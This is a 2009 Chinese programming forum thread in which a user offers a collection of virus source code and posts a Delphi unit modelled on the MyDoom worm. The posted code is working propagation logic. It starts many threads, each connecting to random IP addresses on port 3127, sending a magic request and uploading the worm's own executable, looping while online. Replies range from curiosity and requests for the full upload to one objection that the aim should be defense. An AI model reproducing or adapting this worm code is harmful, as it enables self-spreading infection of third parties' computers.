病毒程序源代码，有要的吗？

xug

基本上都是delphi代码的。很多很多种病毒。

其中包含诸多如来神掌级别的系统编程技巧，这都是在相关手册里面找不到的。让你玩弄windows如戏小儿。

有需要的就上传。

[ 本帖最后由 xug 于 2009-4-30 10:00 编辑 ]

xug

来个例子：

UNIT uMyDoom;

INTERFACE

USES
  Windows, WinSock, WinInet, sysutils;

PROCEDURE StartMyDoom(NumberOfThreads:WORD);

IMPLEMENTATION

VAR
  Request : ARRAY[1..5] OF BYTE = ($85,$13,$3c,$9e,$a2);

TYPE
  TMyDoom = CLASS(TObject)
  PRIVATE
    LANInfect    : BOOL;
    ISPInfect    : BOOL;
    szIPAddr     : STRING;
    szRemoteAddr : STRING;
    PROCEDURE SendFile(FileName,HostName:STRING);
  PUBLIC
    PROCEDURE StartMyDoom;
END;

//------------------------------------------------------------------------------
PROCEDURE TMyDoom.SendFile(FileName,HostName:STRING);
VAR
  F      : FILE;
  Sock   : Integer;
  I      : Integer;
  J      : Integer;
  Is_EOF : Boolean;
  TV     : TTimeVal;
  Addr   : TSockAddrIn;
  Buf    : ARRAY [0..1023] OF Char;
BEGIN
  szIPAddr:=IntToStr(Random(222)+1)+'.'+IntToStr(Random(255)+1)+'.'+IntToStr(Random(255)+1)+'.'+IntToStr(Random(255)+1);
  Sock:=Socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  Addr.sin_family:=AF_INET;
  Addr.sin_addr.S_addr:=inet_addr(pChar(szIPAddr));
  Addr.sin_port:=htons(3127);
  IF Sock<=0 THEN Exit;
  IF Connect(Sock,Addr,SizeOf(Addr))<>0 THEN Exit;
  Send(Sock,Request[1],5,0);
  AssignFile(F,FileName);
  FileMode:=0;
  I:=0;
  Reset(F,1);
  REPEAT
    BlockRead(F,Buf[0],SizeOf(Buf),J);
    IF J<=0 THEN Break;
    IF Send(Sock,Buf[0],J,0)<=0 THEN Break;
    I:=I+J;
  UNTIL j<>1024;
  CloseSocket(Sock);
  CloseFile(F);
END;

//------------------------------------------------------------------------------
PROCEDURE TMyDoom.StartMyDoom;
VAR
  WD : TWSAData;
BEGIN
  WHILE True DO BEGIN
    WHILE NOT InternetGetConnectedState(NIL,0) DO Sleep(1000);
    WSAStartUp(MakeWord(1,1),WD);
    SendFile(paramstr(0),szIPAddr);
    WSACleanup;
  END;
END;

//------------------------------------------------------------------------------
PROCEDURE StartRandomThread;
VAR
  MyDoom : TMyDoom;
BEGIN
  MyDoom:=TMyDoom.Create;
  MyDoom.StartMyDoom;
END;

//------------------------------------------------------------------------------
PROCEDURE StartMyDoom(NumberOfThreads:WORD);
VAR
  I        : WORD;
  Msg      : TMsg;
  ThreadId : Cardinal;
BEGIN
  Randomize;
  FOR I:=1 TO NumberOfThreads DO BeginThread(NIL,0,@StartRandomThread,NIL,0,ThreadID);
  WHILE GetMessage(Msg,0,0,0) DO DispatchMessage(Msg);                          //Make application resident
END;

END.

xug

你的杀毒软件是不是也遇到过这个DOOM病毒？

原来是这个样子的。

菜刀可以杀人，卖菜刀可不是让你去杀人。

你可以将技术用在保护自己的知识产权方面，而不是大面积危害公共信息

这个话题先放这里，看看反映以及有无干扰再决定上传。

[ 本帖最后由 xug 于 2009-4-21 10:59 编辑 ]

cvv

哦呵呵, 开眼界了, 以前还以为病毒都是低级语言编写的呢.

garnnetchenhan

我觉得研究一下倒是没有什么不好，其实语言都是那些，病毒源代码往往可以扩从一些思路！可惜我现在已经不是搞这个了，光搞sql了

sean500

看不懂源码啊，;16

xug

原帖由 cvv 于 2009-4-20 20:29 发表
哦呵呵, 开眼界了, 以前还以为病毒都是低级语言编写的呢.

dos时代内存太小，才不得不设计得精巧一些。现在的病毒只要关心效果如何，根本不用担心代码量

兮辞之曰

q我们要的是防，不是要传！

lsj

搞不清楚如何把它变成一个EXE文件。

super123

看不懂！传上来大家研究下！